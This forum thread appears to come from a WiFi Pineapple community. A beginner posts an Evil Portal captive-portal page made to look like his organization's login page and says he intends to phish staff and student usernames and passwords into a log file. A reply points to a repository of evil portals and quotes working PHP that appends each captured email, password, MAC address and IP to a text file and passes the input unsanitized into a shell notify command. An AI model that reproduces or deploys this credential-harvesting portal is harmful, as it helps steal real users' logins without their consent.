Jump to content

Is it possible to retrieve credentials stolen by Evil Portal to a txt or log file?


Recommended Posts

Hello All,

So I'm a beginner NANO user. I installed the Evil Portal module and loaded it up.

I created a "Basic" html landing page for clients to visit once they connect to the open AP.

I added username & password fields, mimicking the style of my organization's login page, with HTML. 

My objective is to phish the usernames and passwords by sending them to a txt file or log entry.

Could someone help point me in the right direction on how to program data values to be added to a log entry? 


This is the index.php for my login portal.

$destination = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";

        <title>Wireless Portal</title>
        <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <div style="text-align: center;">
            <h1>Orginization Login</h1>
            <p>Sign in with your Org email account.</p>
            <p>Make sure to include your full email address </p>
            <p><strong>jdoe@email.orginization.edu (For Students)</strong> or </p>
            <p><strong>jdoe@orginization.edu (For Staff/Faculty)</strong></p>
                  <input type="text" name="username"><br>
                  <input type="text" name="password">
            <form method="POST" action="/captiveportal/index.php"> /*could I POST the data to the log?*/
                <input type="hidden" name="target" value="<?=$destination?>">
                <button type="submit">Sign in</button>


Link to comment
Share on other sites

Take a look at the portals at https://github.com/kbeflo/evilportals, for example, see the facebook-login:


if (isset($_POST['email'])) {
            $email = isset($_POST['email']) ? $_POST['email'] : 'email';
            $pwd = isset($_POST['password']) ? $_POST['password'] : 'password';
            $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname';
            $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac';
            $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip';
            file_put_contents("$dir/evilportal-logs/facebook-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND);

            exec("notify $email' - '$pwd");


Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...